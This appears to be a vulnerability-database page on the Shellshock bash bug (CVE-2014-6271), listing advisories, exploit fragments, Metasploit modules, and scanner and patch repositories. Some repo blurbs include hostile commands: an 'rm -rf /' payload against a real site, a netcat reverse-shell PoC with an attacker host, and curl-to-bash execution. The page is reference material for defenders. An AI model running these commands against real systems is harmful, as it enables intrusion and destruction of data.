10
HIGH

CVE-2014-6271

Published: 24/09/2014 Updated: 30/11/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

Vulnerability Summary

RHSA-2014:1295: bash Shift_JIS security update

Bash allowed bypassing environment restrictions in certain environments.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Access Complexity: LOW
Authentication: NONE
Access Vector: NETWORK
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

Vulnerability Trend

Affected Products

Vendor Product Versions
GnuBash1.14.0, 1.14.1, 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6, 1.14.7, 2.0, 2.01, 2.01.1, 2.02, 2.02.1, 2.03, 2.04, 2.05, 3.0, 3.0.16, 3.1, 3.2, 3.2.48, 4.0, 4.1, 4.2, 4.3

Vendor Advisories

Bash allowed bypassing environment restrictions in certain environments ...
Stephane Chazelas discovered a vulnerability in bash, the GNU Bourne-Again Shell, related to how environment variables are processed In many common configurations, this vulnerability is exploitable over the network, especially if bash has been configured as the system shell For the stable distribution (wheezy), this problem has been fixed in vers ...
Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169) With this update prefix and suffix for environment variable names which contain shell functions are added as h ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables An attacker could use this flaw to override or bypass environment restrictions to execute shell commands Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue We'd lik ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables An attacker could use this flaw to override or bypass environment restrictions to execute shell commands Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue ...

ICS Advisories

Exploits

#!/usr/bin/env python # RedStar OS 30 Server (BEAM & RSSMON) shellshock exploit # ======================================================== # BEAM & RSSMON are Webmin based configuration utilities # that ship with RSS server 30 These packages are the # recommended GUI configuration components and listen on # a user specified port from 100 ...
## ## This module requires Metasploit: metasploitcom/download ## Current source: githubcom/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' ...
#!/usr/bin/env python # TrendMicro InterScan Web Security Virtul Appliance # ================================================== # InterScan Web Security is a software virtual appliance that # dynamically protects against the ever-growing flood of web # threats at the Internet gateway exclusively designed to secure # you against traditional and e ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Smtp def initialize(info={}) super(update_info(info, 'Name' => 'Qmail SMTP Bash E ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ad ...
#! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: /exploitpy var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker ...
Vantage Point Security Advisory 2015-001 ======================================== Title: Cisco Unified Communications Manager Multiple Vulnerabilities Vendor: Cisco Vendor URL: wwwciscocom/ Versions affected: <92, <1052, <1101 Severity: Low to medium Vendor notified: Yes Reported: Oct 2014 Public release: Aug 13th, 2015 ...
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: ww ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Fi ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(i ...
<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: wwwgnuorg/software/bash/ Author: Prakhar Prasad && Subho Halder Author Homepage: prakharprasadcom && appknoxcom Date: September 25th 2014 Tested on: Mac OS X 1094/1095 with Apac ...
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: wwwqnapcom # Version: ...
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH ex ...
# Exploit Title: PHP 5x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: phpnet # Software Link: phpnet/get/php-562tarbz2/from/a/mirror # Version: 5* (tested on 562) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 < ...
# Exploit Title: ShellShock OpenVPN Exploit # Date: Fri Oct 3 15:48:08 EDT 2014 # Exploit Author: hobbily AKA @fj33r # Version: 2229 # Tested on: Debian Linux # CVE : CVE-2014-6271 #Probably should of submitted this the day I tweeted it ### serverconf port 1194 proto udp dev tun client-cert-not-required auth-user-pass-verify /etc/openvpn ...
#!/bin/python # Exploit Title: Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/ # Version: 42x < 4248 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_sm ...
Exploit Database Note: The following is an excerpt from: securityblogredhatcom/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables Th ...
#!/usr/bin/env python # # Exploit Title : IPFire <= 215 core 82 Authenticated cgi Remote Command Injection (ShellShock) # # Exploit Author : Claudio Viviani # # Vendor Homepage : wwwipfireorg # # Software Link: downloadsipfireorg/releases/ipfire-2x/215-core82/ipfire-215i586-full-core82iso # # Date : 2014-09-29 # # Fixed v ...
# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) # Date: 01 April 2015 # Author: Roberto Suggi Liverani # Software Link: kemptechnologiescom/load-balancer/ # Version: 7116 and previous versions # Tested on: Kemp Load Master 71-16 # CVE : CVE-2014-5287/5288 Link: blogmalerischnet/2015/04/playing ...
#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/bash-43targz # Version: 4311 # Tested on: Ubuntu 14041 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ...

Mailing Lists

GNU Bash versions 43 and below remote command injection exploit that leverages the REFERER header on vulnerable CGI scripts Launches a connect-back shell Written in Perl ...
IPFire, a free linux based open source firewall distribution, versions 215 Update Core 82 and below contain an authenticated remote command execution vulnerability via shellshock in the request headers ...
IPFire versions 215 and below core 82 authenticated CGI remote command injection exploit that leverages the bash vulnerability ...
Cisco Unified Communications Manager versions prior to 1101, 1052, and 92 suffer from multiple command execution vulnerabilities ...
This abuses the bug in bash environment variables (CVE-2014-6271) to get a suid binary inside of VMWare Fusion to launch our payload as root ...
AIS shellshock scanning tool that leverages the User-Agent header against a large list of possible targets Written in C ...
This Metasploit module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables This Metasploit module targets the 'pingsh' CGI script, accessible through the Boa web server on Advantech switches This Metasploit module was tested against firmware version 1322_D198 ...
bashedCgi is a quick and dirty Metasploit module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command ...
This is a proof of concept that demonstrates how the Bash shellshock vulnerability can be used in PHP to bypass disable_functions, safe_mode, etc ...
TrendMicro InterScan Web Security Virtual Appliance remote code execution exploit that leverages the shellshock vulnerability to spawn a connect-back shell TrendMicro has contacted Packet Storm and provided the following link with patch information: <a href="successtrendmicrocom/solution/1105233">successtrendmicrocom/solu ...
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability ...
FutureNet NXR-G240 Series remote shellshock command injection exploit ...
This is a shellshock exploit for RSSMON and BEAM, network services for Red Star OS version 30 SERVER edition ...
Due to a processing issue with environment variables it is possible to leverage bash for command execution through various methodologies ...
This Metasploit module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default ...
This is information regarding more bash vulnerabilities and how the original bash patches are ineffective ...
DNS reverse lookups can be used as a vector of attack for the bash shellshock vulnerability ...

Nmap Scripts

http-shellshock

Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-shellshock: | VULNERABLE: | HTTP Shellshock vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-6271 | This web application might be affected by the vulnerability known as Shellshock. It seems the server | is executing commands injected via malicious HTTP headers. | | Disclosure date: 2014-09-24 | References: | http://www.openwall.com/lists/oss-security/2014/09/24/10 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 | http://seclists.org/oss-sec/2014/q3/685 |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Metasploit Modules

IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers.

msf > use exploit/linux/http/ipfire_bashbug_exec
      msf exploit(ipfire_bashbug_exec) > show targets
            ...targets...
      msf exploit(ipfire_bashbug_exec) > set TARGET <target-id>
      msf exploit(ipfire_bashbug_exec) > show options
            ...show and set options...
      msf exploit(ipfire_bashbug_exec) > exploit
DHCP Client Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.

msf > use auxiliary/server/dhclient_bash_env
      msf auxiliary(dhclient_bash_env) > show actions
            ...actions...
      msf auxiliary(dhclient_bash_env) > set ACTION <action-name>
      msf auxiliary(dhclient_bash_env) > show options
            ...show and set options...
      msf auxiliary(dhclient_bash_env) > run
Advantech Switch Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98.

msf > use exploit/linux/http/advantech_switch_bash_env_exec
      msf exploit(advantech_switch_bash_env_exec) > show targets
            ...targets...
      msf exploit(advantech_switch_bash_env_exec) > set TARGET <target-id>
      msf exploit(advantech_switch_bash_env_exec) > show options
            ...show and set options...
      msf exploit(advantech_switch_bash_env_exec) > exploit
Qmail SMTP Bash Environment Variable Injection (Shellshock)

This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

msf > use exploit/unix/smtp/qmail_bash_env_exec
      msf exploit(qmail_bash_env_exec) > show targets
            ...targets...
      msf exploit(qmail_bash_env_exec) > set TARGET <target-id>
      msf exploit(qmail_bash_env_exec) > show options
            ...show and set options...
      msf exploit(qmail_bash_env_exec) > exploit
OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access.

msf > use exploit/osx/local/vmware_bash_function_root
      msf exploit(vmware_bash_function_root) > show targets
            ...targets...
      msf exploit(vmware_bash_function_root) > set TARGET <target-id>
      msf exploit(vmware_bash_function_root) > show options
            ...show and set options...
      msf exploit(vmware_bash_function_root) > exploit
Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the Pure-FTPd FTP server when it has been compiled with the --with-extauth flag and an external Bash script is used for authentication. If the server is not set up this way, the exploit will fail, even if the version of Bash in use is vulnerable.

msf > use exploit/multi/ftp/pureftpd_bash_env_exec
      msf exploit(pureftpd_bash_env_exec) > show targets
            ...targets...
      msf exploit(pureftpd_bash_env_exec) > set TARGET <target-id>
      msf exploit(pureftpd_bash_env_exec) > show options
            ...show and set options...
      msf exploit(pureftpd_bash_env_exec) > exploit
Dhclient Bash Environment Variable Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. Due to length restrictions and the unusual networking scenario at the time of exploitation, this module achieves code execution by writing the payload into /etc/crontab and then cleaning it up after a session is created.

msf > use exploit/unix/dhcp/bash_environment
      msf exploit(bash_environment) > show targets
            ...targets...
      msf exploit(bash_environment) > set TARGET <target-id>
      msf exploit(bash_environment) > show options
            ...show and set options...
      msf exploit(bash_environment) > exploit
CUPS Filter Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password is required to exploit this vulnerability through CUPS.

msf > use exploit/multi/http/cups_bash_env_exec
      msf exploit(cups_bash_env_exec) > show targets
            ...targets...
      msf exploit(cups_bash_env_exec) > set TARGET <target-id>
      msf exploit(cups_bash_env_exec) > show options
            ...show and set options...
      msf exploit(cups_bash_env_exec) > exploit
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
      msf exploit(apache_mod_cgi_bash_env_exec) > show targets
            ...targets...
      msf exploit(apache_mod_cgi_bash_env_exec) > set TARGET <target-id>
      msf exploit(apache_mod_cgi_bash_env_exec) > show options
            ...show and set options...
      msf exploit(apache_mod_cgi_bash_env_exec) > exploit
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
      msf auxiliary(apache_mod_cgi_bash_env) > show actions
            ...actions...
      msf auxiliary(apache_mod_cgi_bash_env) > set ACTION <action-name>
      msf auxiliary(apache_mod_cgi_bash_env) > show options
            ...show and set options...
      msf auxiliary(apache_mod_cgi_bash_env) > run

Github Repositories

shellshocker-android This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271 Stefano Belli, &lt;(C) Copyleft, share, rebuild, modify, redistribuite as you think it should be better Google+: plusgooglecom/+StefanoBelli WebSite: wwwinthebitit Next update ready, i will upload nextly

cve-2014-6271-huan-lu reading course

shellshock_scanner Python Scanner for "ShellShock" (CVE-2014-6271)

shellshock-shell A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug Use it to exploit known vulnerable URLs This tool may be used only on your own authorized URLs The author of this tool takes no responsibility for its usage File name: shellshockpy Author: Sagi Levy - Sagi@pwnguycom Date created: 27/09/2014 Python Version: 27 Example: /shellshockpy

pyshellshock Python library and utility for CVE-2014-6271

Patch for CVE-2014-6271 securityblogredhatcom/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Usage install ansible on your local host add the servers you wish to patch to inventory run ansible-playbook /deployyml -i inventory

North Korea ICT 1 North Korea Internet 2 Redstar OS and Browser Redstar PC Redstar Server RedStar 30 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection [Exploit DB] wwwexploit-dbcom/exploits/40938/ [CVE-2014-6271] cvemitreorg/cgi-bin/cvenamecgi?name=cve-2014-6271 3 Security "See swsecurityml

shellshocker-python This is a Python Application that helps you detect if your machine that run Bash is vulnerable by CVE-2014-6271

Prerequisite sudo pip install shell install google python search githubcom/MarioVilas/google Run I use google to search first 1000 sites and try to get the /etc/passwd After tesing, there are many many many host that can be rooted!!!! By the way, this is only a proto, it has false positives Output like this: if second field is !!!, then You Can Get SHELL! $ python

CVE-2014-6271 This is part of Cved: a tool to manage vulnerable docker containers Cved: gitlabcom/git-rep/cved Image source: githubcom/cved-sources/cve-2014-6271 Image author: githubcom/Medicean/VulApps/tree/master/b/bash/shellshock1_CVE-2014-6271

Google Chrome DoShtml Hover link to crash Google Chrome tab Shellshockpy CVE-2014-6271 cgi-bin exploit, create a reverse shell xsplitpy Script goes into the local database of XSPLIT and grabs the login creds/auth-token and much more Works only locally on a computer NinjaPypy Create python shellcode, one-line code only!

BLOG Keep notes of your study time References Blogs Fastersite Organization: Google Achievements: Google Chrome WebKit Speed Team Lead Keywords: Google Chrome, Speed, WebKit Stoyan’s phpiedcom Organization: Facebook, ex-Yahoo Acheivements: Architect of the YSlow 20 performance tool creator of the smushit Books: Facebook, YSlow, Smushit JavaScript for PHP

libsecurity When we're talking about security, the internet is the true wild wild west of today and the problems doesn't seem to be disappearing anytime soon Until we find a way to create bulletproof server software we'll need a system in place to react as quick as possible to the release of new vulnerabilities Traditionally it can be very difficult for a softw

CVE DB About CVE DB is a sqlite DB with CVEs and Python API CVEs are scrapped from CVE Details Latest DB is from 17012017 Why? It seems there is no developer friendly CVE data available Usage DB Download latest sqlite DB from dbs and extract Python Updating DB with open('csv_listtxt', 'r') as csv_h: with CVE_DB() as db: for cve_na

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug) Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) Example: $ /Scanner -i 127001 -p 31337 -l sitestxt -t 5 Starting listen in localhost on port 31337, scan sites in file 'sitestxt', and set connecti

CGIShell shellshock CVE-2014-6271 CGI Exploit Use like OpenSSH via CGI Page Use python cgishellpy 'wwwgooglecom/cve-2014-6271/poccgi' Screenshot Dependence Windows needed pyreadline It is not needed chardet Future Add TestCase HTTP Login Support http transmission gzip compression chardet identify and decode any bug fix Issues Windows Untest

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug) Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) Example: $ /Scanner -i 127001 -p 31337 -l sitestxt -t 5 Starting listen in localhost on port 31337, scan sites in file 'sitestxt', and set connecti

bash-up a auto script to fix CVE-2014-6271 bash vulnerability

Nessus_CVE-2014-6271_check Quick and dirty nessus audit file to check is bash is vulnerable to CVE-2014-6271

debian-lenny-bash_3252-cve-2014-6271 Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64) You can test the flaw by running: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

bash-fix-exploit A tiny role that checks to see if the CVE-2014-6271 exploit is still valid Use at your own risk Read about the exploit here: communityrapid7com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271 Requirements Assumes that you're using bash as your shell Role Variables update_bash - defaults to "no

CVE-2014-6271 patches for bash The original mailing list post only lets you fetch the patches over unauthenticated HTTP Sigh I've downloaded these over HTTP and put them into a git repository that you can fetch over HTTPS and check independently I have not checked whether these files are authentic, but you can check independently whether you have the same files Origin

CVE-2014-6271 Bash Shellshock (and Aftershock) Tester for Ansible Install Ansible docsansiblecom/intro_installationhtml Add servers to inventory file (example): username@ip Copy your public key to remote servers' ssh/authorized_keys execute test $ ansible-playbook -i inventory siteyml

bro-scripts Find us on the web at wwwCriticalStackcom Check out our new Intel Marketplace for Bro Repository includes a set of Bro scripts to be shared with the community CVE-2014-6271 Exploit Detector- The CVE-2014-6271 vulnerability in the venerable Bourne-Again SHell (BASH) is rated as a Level 10 allowing full, unauthenticated remote access to your systems; it's g

bash-CVE-2014-6271 Cookbook This Chef cookbook contains a default recipe that will fail your Chef run if a bash is found and that bash is vulnerable to the remote exploit described in CVE-2014-6271 The places to look for bash can be configured in the node['bash-CVE-2014-6271']['bashes'] attribute (see below) Requirements Should work on any UNIX/Linux Pleas

BadBash CVE-2014-6271 (ShellShock) RCE PoC tool ======= BadBash is a CVE-2014-6271 RCE exploit tool The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234 Developer : Andy Yang Version : 010 License : GPLv3 Orginal github project : githubcom/RainMak3r/Rainstorm ========================================================

shellshock-cgi A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server Usage $ python testingpy --server 17216255130 --listen 172162551 ##Example Return: [+] Testing if 17216255130 is vulnerable to CVE-2014-6271 via CGI [+] Listening for incoming connections on the following socket 172162551:4443 [!] The server is vulnerable a

Shellshock-Vulnerability-Scan Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock Download app from play store playgooglecom/store/apps/details?id=inindiandragonshellshockshellshockvulnerabilityscan

====================== shellshock bash update This recipe tries to upgrade bash from OS pkg, and falls back to compile bash on systems with no update available Works for us on old ubuntu/debian Bash install script from: askubuntucom/questions/528101/what-is-the-cve-2014-6271-bash-vulnerability-and-how-do-i-fix-it Usage Can be used as an gitfs salt formula: fileserver_

patched-bash-43 patched-bash-43 for CVE-2014-6271 This is just bash 43 , pulled from the gnu website, and patched with the patches available on 9/26/2014, including the pkgsrc functionality changes that just disable the silly "execute functions in env variables" altogether The patches are also included here, but I've already applied them to the sourcecode (fo

CVE-2014-6271py 写了个脚本,实现中使用的是未封禁的GOOGLE的IP,因此不用翻墙就能直接使用。 实现功能 goolge批量检测BASH漏洞; 对给定URL进行EXPLOIT; 统计功能,大概就是了解下BASH漏洞的概率,测试了下,差不多500个URL才出一个可利用的BASH漏洞的URL; 把具有漏洞的URL写入文件。 使用方法

Cgi-bin_bash_Reverse POC for CVE-2014-6271 Src:gistgithubcom/matjohn2/bc9689c60d4c9c5a2538

shellshock scripts associated with bourne shell EVN function parsing vulnerability CVE-2014-6271 dhcp_monpy - This script monitors DHCP frames for potentially malicious characters within BOOTP and DHCP reply fields

CVE-2014-6271 python27 Start listening on your machine nc -l -p 4444 Run python script by the rule below: python shellpocpy &lt;host&gt; &lt;vulnerable CGI&gt; &lt;attackhost/IP&gt; python shellpocpy 101010101 /cgi-bin/status 1010101/4444 Enjoy

================================================================================================ BadBash is a CVE-2014-6271 RCE exploit tool The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234 Developer : Andy Yang Version : 010 License : GPLv3 ===============================================================================

CVE-2014-6271

shocknaww Simple script to check for CVE-2014-6271 Example Usage /shocknawwpy foobar/cgi-bin/foo Sample vulnerable environment From the parent directory, run the following python -m CGIHTTPServer Now use shocknaww against your localhost test server /shocknawwpy 127001:8000/testpy

shellshock-Ansible This is a proof-of-prinicple to show that Ansible can be used to patch BASH on OS X Specifically for CVE-2014-6271 and CVE-2014-7169 Work in this project is based off of the posting(s) of alblue - albluebandlemcom Main reference is his evolving post applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploi

Check this thread on stackexchange The script has been taken from there: applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271 IMPORTANT: Install Xcode before executing the script! Usage git clone git@githubcom:mdix/OSX-bash-fixgit cd OSX-bash-fix chmod +x *sh /buildsh # If buildsh went well, your patched bash ha

CLI tool to check via nodejs if you have a vulnerable bash Shellshock (CVE-2014-6271) Install npm install shellshock -g Execute shellshock Output ✗ vulnerable bash or ✓ bash not vulnerable Contributors neydroid

CVE-2014-6271 An automated way to fix bash Testing for the Vulnerability You can determine if you are vulnerable by executing this test: env x='() { :;}; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability Run this on the command line You may be prompted to enter your password bash &lt;( curl -s rawgithubusercontentcom/mattclegg/CVE-20

Autoit Malware Scripts Una serie de scripts programados por allá del 2014/15 Hechos totalmente por diversión y aprendizaje Tened en cuenta que todos estos scripts fueron probados en el sistema operativo Windows 7 así como también en las versiones de Safari, Chrome y Opera de ese año RunPE - RunPEx64 Un RunPE es un script hecho para ejecutar

CVE-2014-6271 Script to attack shellshock vulnerability [!] Usage: /ShockZaum -u 'nasagov' -c 'rm -rf /' -p '/cgi-bin/alienscgi'

Voxer Nagios Plugins Plugins for nagios used by Voxer, made specifically for SmartOS Plugins check_shellshock Check bash for CVE-2014-6271 (shellshock) $ check_shellshock ok: bash is secure against shellshock You can pass an optional binary to check as the first argument, defaults to bash in your $PATH $ check_shellshock /bin/bash critical: /bin/bash is vulnerable to shellshoc

About US 趣旨 {何か}の情報の共有・活動場所や機会をつくる 活動内容 定例会 開催頻度は隔週。当分の間は自由に使える場所を使って行ってみる。占領はしないように気をつける。 内容(案です、内容募集してます) 簡単な発表・共有 こんなコード書きました こんなツール・言語便利

shellshock-hunter-google Search Google and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock Installation Requires Python 27 pip install --user selenium gevent git clone githubcom/DanMcInerney/shellshock-hunter-google cd shellshock-hunter-google/ Example python shellshock-hunter-googlepy -

shellshock-hunter Search Bing and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock Usage git clone githubcom/DanMcInerney/shellshock-hunter cd shellshock-hunter/ python shellshock-hunter -s "search_terms" -k your_bing_api_key -p number_of_pages_to_check -p will default to 1 page g

This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible Supported platforms: Debian (5, 6, 7) Ubuntus (1204 LTS, 1404 LTS, 1410) RHEL/CentOS (5, 6) Usage class {'shellshock': } Facter provided facter -p shellshock not_vulnerable Author Renan Vicente (@renanvicent

PHP-Webshells-Collection Most Wanted Private and Public PHP Web Shells Can Be Downloaded Here (Educational Purpose Only) I am not responsible for how you use this stuff Default Password for All Shells (if not available in shell description): wso Tools PHP deobfuscators: Online: FOPO PHP Deobfuscator ver 01 | ver 02 Sucuri's PHP decoder Toolki's PHP decoder un

Awesome Security A collection of awesome software, libraries, documents, books, resources and cool stuff about security Inspired by awesome-php, awesome-python Thanks to all contributors, you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources Awesome Security Network Scann

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honypot or easily deployed by Modern Honey Network (MHN): githubcom/threatstream/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt Configuration Edit shockpotco

Shellshock Burp Plugin A burp plugin to provide active scanning for CVE-2014-6271 against Apache's MOD_CGI Download Compiled to Java 6 for luddites and the like Download here! Building mvn package

